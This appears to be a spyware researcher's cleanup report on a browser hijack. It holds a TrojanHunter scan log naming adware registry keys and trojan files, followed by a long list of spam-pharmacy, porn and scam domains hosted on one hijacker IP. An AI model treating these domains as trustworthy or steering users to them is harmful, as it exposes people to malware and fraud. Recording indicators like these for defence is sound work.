0700 0500 0001 0800                   ........




Outpost Anti-Spyware plugin was able to restore the disabled task manager, here you can see Regrun indicating it has been restored :

:: TrojanHunter Scan ::

Some stuff from a previous harvest the day before, but most is from this hijack.. Missed a keylogger and various files in system folders detected by Spyware Doctor.. The system was about 95% clean at this stage , I just wanted to see what I had missed.

No suspicious entries found
No suspicious open ports found
No trojans found in memory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5321E378-FFAD-4999-8C62-03CA8155F0B3} (matches Adware.MasterX.100)
Registry key exists: HKEY_CLASSES_ROOT\Replace.HBO.1 (matches Adware.MasterX.100)
Registry key exists: HKEY_CLASSES_ROOT\Replace.HBO (matches Adware.MasterX.100)

Registry key exists: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5321E378-FFAD-4999-8C62-03CA8155F0B3} (matches Adware.MasterX.100)

Registry key exists: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TSA (matches Adware.TargetSaver.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\crap\paytime.exe (StartPage.148)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\crap\tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\crap march 11\MTE3NDI6ODoxNg.exe/39Z6S.exe (TrojanDownloader.Small.153)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\crap march 11\secure32.html (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\crap march 11\stub_113_4_0_4_0.exe/uNCawR.exe (TrojanDownloader.TSUpdate.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hijack march.rar/secure32.html (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hijack march.rar/secure32[1].htm (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hijack march.rar/paytime.rar/paytime.exe (StartPage.148)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\files.rar/MTE3NDI6ODoxNg.exe/bOaXroq.exe (TrojanDownloader.Small.153)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\files.rar/secure32.html (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\files.rar/secure32[1].htm (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\files.rar/stub_113_4_0_4_0.exe/8mUEeY7.exe (TrojanDownloader.TSUpdate.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\files.rar/tool4.exe (KillAV.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\files.rar/tool5.exe (KillAV.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\files.rar/tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\files.rar/tsinstall_4_0_4_0_b4.rar/tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\MTE3NDI6ODoxNg.exe/PoAa3.exe (TrojanDownloader.Small.153)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\secure32.html (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\secure32[1].htm (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\stub_113_4_0_4_0.exe/oK8orQoC.exe (TrojanDownloader.TSUpdate.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\tool4.exe (KillAV.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\tool5.exe (KillAV.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\files\tsinstall_4_0_4_0_b4.rar/tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\part 2\secure32.html (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\part 2\tool1.exe (KillAV.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\part 2\tool4.exe (KillAV.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack\part 2\tool5.exe (KillAV.100)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack.rar/files.rar/MTE3NDI6ODoxNg.exe/XR7.exe (TrojanDownloader.Small.153)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack.rar/files.rar/secure32.html (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack.rar/files.rar/secure32[1].htm (Harnig.103)

Found trojan file: C:\Documents and Settings\spywarekiller\Desktop\LOGS\storage\hack.rar/files.rar/stub_113_4_0_4_0.exe/vwcZfsK.exe (TrojanDownloader.TSUpdate.100)



=========================================



Hijacks from

www.z0rder.com = 80.77.80.145

search.urlmax.org

404 domains found on 80.77.80.145

www.1100drug.biz
www.1med.info
www.2-you.info
www.2developer.com
www.4-fin.info
www.47hromosom.com
www.7-pharmacy.com
www.7-pharmacy.org
www.ab-dating.com
www.abiturient.biz
www.abler.biz
www.action-in-public.com
www.adultallfree.com
www.ae-dating.com
www.agahabaz.info
www.aglare.net
www.aglow.biz
www.agrienter.com
www.agroferma.com
www.albersx.com
www.alexdixi.com
www.alfasort.biz
www.all-rybinsk.info
www.allcheapmeds.info
www.allpills.info
www.allworldplanet.info
www.alpam.com
www.alt1.info
www.amalgama-shop.com
www.amirny.com
www.analandguys.com
www.angelicfantasy.net
www.argued2joy.info
www.artmaur.com
www.astagor.com
www.attackedass.com
www.auto-directory.net
www.awningsearch.com
www.banservice.info
www.best-about-sex.com
www.bestbooksshop.info
www.bestcarsshop.info
www.bestcheappills.com
www.besthardcoregirls.com
www.bestjob-service.net
www.bestmeds4u.info
www.bestmensmeds.info
www.bestporntop.info
www.bestrx.info
www.bestshoppro.info
www.bestworldonline.info
www.billcards.biz
www.biosupershop.info
www.bondsites.info
www.boundarik.info
www.british-credit-unions.com
www.bustyladies4u.com
www.butalbital-fioricet-caffeine.com
www.buy-phentermine-online.info
www.Buypharmshere.biz
www.Buyshoponline.info
www.Cabrera.biz
www.Caliosso.com
www.Canadafarmacy.biz
www.Cantouchme.com
www.Cddvdx.com
www.Cheapestrx.info
www.Cheapmeds4you.info
www.Cheaprx4u.info
www.Chuchuka.com
www.Cleaner2006.com
www.Coolbestworld.info
www.Creamycunt.net
www.Cutesource.info
www.Daporno.net
www.Dating--online.net
www.Debalance.com
www.Dengimaker.com
www.Diamondnet.info
www.Digitela.com
www.Discount-price-pharmacy.com
www.Dotproshop.info
www.Download-madonna-mp3.com
www.Dreampharmacy.info
www.Dsiltd.com
www.Ducklingby.com
www.E7da7.info
www.Earth-port.biz
www.Edwardso.net
www.Effect2005.info
www.Emersis.com
www.Eromaxstudio.com
www.Erostuff.com
www.Eumus.com
www.Euroworldcup.info
www.Every4free.info
www.Ezyrest.net
www.Factory-xxx.com
www.Famouspills.com
www.Fangenporn.com
www.Fat-biatch.com
www.Fekla.com
www.Fetish-secret.com
www.Fetishcharm.com
www.Findirectory.org
www.Firstshopstore.info
www.Firsttop.info
www.Fixmyscripts.com
www.Fnfpromo.com
www.Foresterad.com
www.Foxtem.com
www.Free-porn-movie-clip.com
www.Free-porno-now.com
www.Freeaction.info
www.Freehairymilf.com
www.Freematureass.com
www.Freemilfarchives.com
www.Freemilfolder.com
www.Freeporn-pix.com
www.Freeproshop.info
www.Freeshoplinks.com
www.Freesites4adults.com
www.Fucking-losers.com
www.Fuel-oil.biz
www.Funkytraf.com
www.Fx-pom.com
www.Galantweb.net
www.Galushkin.com
www.Galviever.info
www.Gamezer.com
www.Gasneftinvest.com
www.Gay--x.com
www.Gay-circle.com
www.Gayvideoportal.info
www.Gaznefteinvest.com
www.Gidropharm.com
www.Gingersnap5.com
www.Go2hotguy.com
www.Go3magick.com
www.Goodsyst.com
www.Goteleport.com
www.Greatshoppin.info
www.Greatworldtrade.info
www.Half-price-pharmacy.info
www.Hamapalesrel.info
www.Headblock.info
www.Hidesfiles.com
www.Horny-teens.biz
www.Hq-portal.com
www.Hqcd.net
www.Hyip-masterpiece.com
www.Hyipsport.com
www.Icq-shop.com
www.Infinity-speed.com
www.Intel-info.net
www.Internet-banking-commerce.com
www.Intexinvest.com
www.Invertor-tour.com
www.Investment-pool.net
www.Iq-creative.com
www.Iq-google.com
www.Iq-matrix.com
www.Iq-sms.com
www.Iq-tv.net
www.Javaforcellphone.com
www.Joannabromley.com
www.Job-tutorial.com
www.Joomla-force.com
www.Jscripts.info
www.Kaktustwist.com
www.Kissesworld.com
www.Konkursov.net
www.Kudesnyk.com
www.Kudesnyk.net
www.Laborexchange.biz
www.Ldpr18.org
www.Legocp.com
www.Lesbianbondagesex.com
www.Lesbyporn.com
www.Liderlinks.net
www.Lik1.info
www.Lingerie-queens.com
www.Livehotshows.com
www.Lovefreeporno.com
www.Lucky-go.com
www.Luminescent.biz
www.Luminous.biz
www.Magazindvd.com
www.Master-serach.com
www.Mature101.com
www.Max-expromt.com
www.Max-thumbs.com
www.Mazda-rus.com
www.Megabest.info
www.Milliondollar-homepages.net
www.Miruku.info
www.Mobilization.biz
www.Moboos.com
www.Momsanalsex.net
www.Mp3load.info
www.Mp3page.org
www.Mp3spice.com
www.Mplace.info
www.Msk-play.com
www.Murman-news.com
www.Mylinkssite.com
www.Myskp.com
www.Nadoelo.com
www.Nameforyoursite.net
www.Nastyprettygirl.net
www.Neoworldtrade.info
www.Neposhlaya.com
www.Newestoffice.com
www.Newestsoft.com
www.Newsblock.info
www.Newworldgift.info
www.Newworldglobal.info
www.Newworldshop.info
www.Ngtsoftware.com
www.Nikrazov.com
www.Nylon-adventures-xxx.com
www.Odnolko.com
www.Offensireg.info
www.Oldpornsite.info
www.Onedayfund.com
www.Oneworldsoft.info
www.Online-best-casino-gambling.com
www.Onlineusapills.com
www.Oppler.org
www.Osintsev.com
www.Pattaya-picture.com
www.Petsetshop.info
www.Pharm4all.biz
www.Pharma-cology.com
www.Pharmacy-find.info
www.Pharmbroker.biz
www.Pharmstores.info
www.Pill-store.net
www.Pills-onthe.net
www.Pillspharm.info
www.Pink-world.net
www.Playboybest.com
www.Plenton.com
www.Plexoos.com
www.Pod-kluch.com
www.Ponomarev.biz
www.Porn-xxxlife.com
www.Porngallereis.com
www.Pornodrom.net
www.Pornsearch4free.com
www.Pornstarfile.info
www.Pornxvideos.com
www.Posmotri.info
www.Postshoppen.info
www.Prikols.info
www.Pro-vizal.com
www.Prof-cto.com
www.Promomaster.org
www.meow-squirts.com
www.meow-squirts.net
www.Rapid-find.net
www.Rd-world.info
www.Realporntgp.com
www.Respiration.biz
www.Roberson.biz
www.Robodir.com
www.Ruerotic.com
www.Russia-ooo.com
www.Russwatches.com
www.Rx-store.info
www.Rx4you.info
www.Rxforyou.info
www.Saltnuts.com
www.Searchcabin.com
www.Sellurphone.com
www.Seo-promotion.org
www.Seobox.net
www.Services-dating.org
www.Sex-adult-video.com
www.Sex-galls.com
www.Sexdreamworld.com
www.Sexpicsglobal.net
www.Sexxxfilms.com
www.Sexybikinibabes.org
www.Shemalesexymovies.com
www.Shock-bbs.com
www.Shopcenterworld.info
www.Shopfunworld.info
www.Shopguideeurope.info
www.Shopmorestore.info
www.Shopnowdirect.info
www.Shopnownetwork.info
www.Shopnowplus.info
www.Shoppetstore.info
www.Shopproteam.info
www.Shopworldtech.info
www.Sivitsky.com
www.Skyworldplanet.info
www.Smartfixer.com
www.Softaspect.com
www.Softwarewin.com
www.Soma-carisoprodol-drugs.com
www.Spbsexyboy.com
www.Starshopdirect.info
www.Superporngalleries.com
www.Supershopnow.info
www.Sw-cms.com
www.Teen-set.com
www.Teeniehome.com
www.Teenssexporn.com
www.Tgpredirect.net
www.Thebestxxxhardcore.com
www.Therealporn.com
www.Theworldroom.info
www.Tommybutts.com
www.Toonsic.com
www.Topgaybears.com
www.Topresult.info
www.Tramadol-ultram-ultracet.com
www.Treg-moscow.com
www.Trinicorp.net
www.Trxporn.com
www.Udasha.com
www.Ufa-vision.net
www.Umkoball.com
www.Unixt.net
www.Urstroysouz.org
www.Usameds4u.info
www.Usamedsonline.info
www.Usaworldsite.info
www.Used-car-california.com
www.Usefulsolution.com
www.Usergate.org
www.Vip-find.com
www.Virginteenporn.net
www.Vitaly.org
www.Vitoplan.com
www.W-dating.com
www.Warezwm.com
www.Web-direct-zv.com
www.Webcash-net.com
www.West-east.biz
www.Whitefeed.com
www.Wirelessshopnow.info
www.Worldboxglobal.info
www.Worldgloballink.info
www.Worldglobalsales.info
www.Worldshopguide.info
www.Worldstockdirect.info
www.Worldtradeeasy.info
www.Worldtradepro.info
www.Worldtradingcup.info
www.Www-problem.net
www.X2zoom.com
www.Xehtai.com
www.Xstyles.net
www.Xxx-nude-galleries.com
www.Xxx-seek.net
www.Xxx-tgp.org
www.Xxxgolinks.com
www.Youcansearch.com
www.Yourmedsshop.info
www.Yourshopguide.info
www.Yourshoppig.info
www.Yourworldclass.info
www.Yourworldusa.info
www.Z-metric.com
www.Z0rder.com
www.All999drugs.com
www.Allmeds.info
www.Bestgift.biz
www.Bestshoprx.info
www.Bluepills.info
www.Canamedz.info
www.Cheaprxbuyers.com
www.Edpills.info
www.Edshop.biz
www.Erotpops.com
www.Eve-cash.com
www.Getpillsonline.net
www.Greatpharm.info
www.Meds2u.info
www.Meds4health.info
www.Medsonlinne.info
www.Medsshop.info
www.Menheallth.info
www.Menhealt.info
www.Mycialis.info
www.Onlyhot.info
www.Penny-sex.com
www.Pharm4you.info
www.Pillmoney.biz
www.Rxshop.info
www.Seenowpics.com
www.Tds-system.info
www.Thehealthcare.info
www.Thehealz.info
www.Themedsonline.info
www.Themedz.biz
www.Viagranow.info
www.Webaltair.net
www.Yermeds.info
www.Yourtabs.info
www.Zdravshop.com

